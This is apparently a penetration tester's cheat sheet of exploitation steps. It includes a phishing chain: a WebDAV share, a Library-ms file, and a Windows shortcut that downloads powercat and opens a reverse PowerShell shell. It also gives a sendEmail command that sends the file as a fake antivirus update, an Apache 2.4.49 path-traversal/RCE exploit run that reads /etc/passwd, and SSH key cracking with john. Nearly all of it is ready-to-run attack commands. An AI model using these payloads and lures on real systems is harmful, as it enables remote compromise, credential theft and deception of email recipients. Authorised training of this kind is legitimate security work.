Exploitation

Malicious Shortcut via Powercat

create a shortcut on desktop: Host on WebDAV

/home/c4/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/c4/pwnshare/tools

Create the config.Library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://IP</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Create Shortcut on Windows.

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://IP/powercat.ps1');
powercat -c IP -p 4444 -e powershell"

Sending Malicious Email

-a Attach
-xu Executing User
-xp Password
-f FROM
-t TO
-u SUBJECT
-m BODY

sendEmail -t user@email.com -f c4@malicious.com -u ATTENTION: Antivirus Update -a /home/c4/pwnshare/tools/config.Library-ms -s IP -m "double click file to update antivirus" -xu admin@mail.com -xp P@55w0rd

Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)

cp ~/pwnshare/tools/50382.sh . 
chmod +x 50382.sh
setup targets.txt
EXAMPLE:
./50382.sh 245 /etc/passwd 

SSH Key Cracking

Prep the hash for john:

ssh2john id_ecdsa > id_ecdsa.hash   

Using the Password list.

john --wordlist=passwords.txt id_ecdsa.hash